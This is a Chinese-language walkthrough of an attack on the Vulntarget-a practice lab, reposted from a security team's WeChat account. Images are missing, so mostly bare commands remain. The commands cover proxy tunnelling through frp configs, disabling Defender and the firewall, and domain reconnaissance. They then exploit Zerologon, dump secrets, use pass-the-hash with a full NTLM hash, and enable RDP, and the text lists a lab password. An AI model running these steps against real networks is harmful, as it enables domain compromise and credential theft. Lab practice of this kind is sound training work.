Vulntarget-a

前言：

本文来自团队师傅："一只虾虾虾虾虾"的投稿，在此致谢。本文内容关于Vulntarget-a靶场的攻击全过程，非常适用于刚学习内网渗透的朋友。

1. 外网打点

访问靶机地址：

http://192.168.0.104/qcuicmnflz.php

2. 边界突破

socks 27424 SOCKS5 enableNoAuth "" "" disableLogging

systeminfo

netstat -an | find "3389"

3. 内网其他主机

通过入口机建立监听器：

输入名称进行保存：

taskkill /F /IM MsMpEng.exe （失败）

https://xz.aliyun.com/t/12280#toc-8

powershell -Command "ls"

netsh advfirewall set allprofiles state off

shell netsh advfirewall show allprofiles

4. 横向其他主机

arp -a

ipconfig

fscan

VULNTARGET

nslookup -type=SRV _ldap._tcp.corp

netdom query pdc

ipconfig /all

net group "domain controllers" /domain

net time /domain

net group /domain

域内主机只有win2016：

net group "domain computers" /domain

http://myblog.ac.cn/archives/2023-01-01-15-38-00

[common]bind_addr =0.0.0.0bind_port =9000

[common]server_addr = 43.139.74.167server_port = 9000[socks_proxy]type = tcpremote_port =6789plugin = socks5#端口转发[portforward]type = tcplocal_ip = 127.0.0.1remote_port = 6000local_port = 6000

[common]bind_port = 9001

[common]server_addr = 10.0.20.98server_port = 9001[sock5]type = tcpplugin = socks5remote_port = 6000

• 漏洞描述

• Windows Server 2008 R2 for x64 -based Systems Service Pack 1
• Windows Server 2008 R2 for x64 -based Systems Service Pack 1 (Server Core installation)
• Windows Server 2012
• Windows Server 2012 (Server Core installation)
• Windows Server 2012 R2
• Windows Server 2012 R2 (Server Core installation)
• Windows Server 2016
• Windows Server 2016 (Server Core installation)
• Windows Server 2019
• Windows Server 2019 (Server Core installation)
• Windows Server, version 1903 (Server Core installation)
• Windows Server, version 1909 (Server Core installation)
• Windows Server, version 2004 (Server Core installation)

proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110

https://blog.csdn.net/liu_jia_liang/article/details/123226141

proxychains4 python3 secretsdump.py vulntarget.com/win2019$@10.0.10.110 -no-pass

proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110

reg add "HKLMSystemCurrentControlSetControlTerminalServerWinStationsRDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /fwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

administrator/Admin@666

原文始发于微信公众号（前进四安全团队）：Vulntarget-a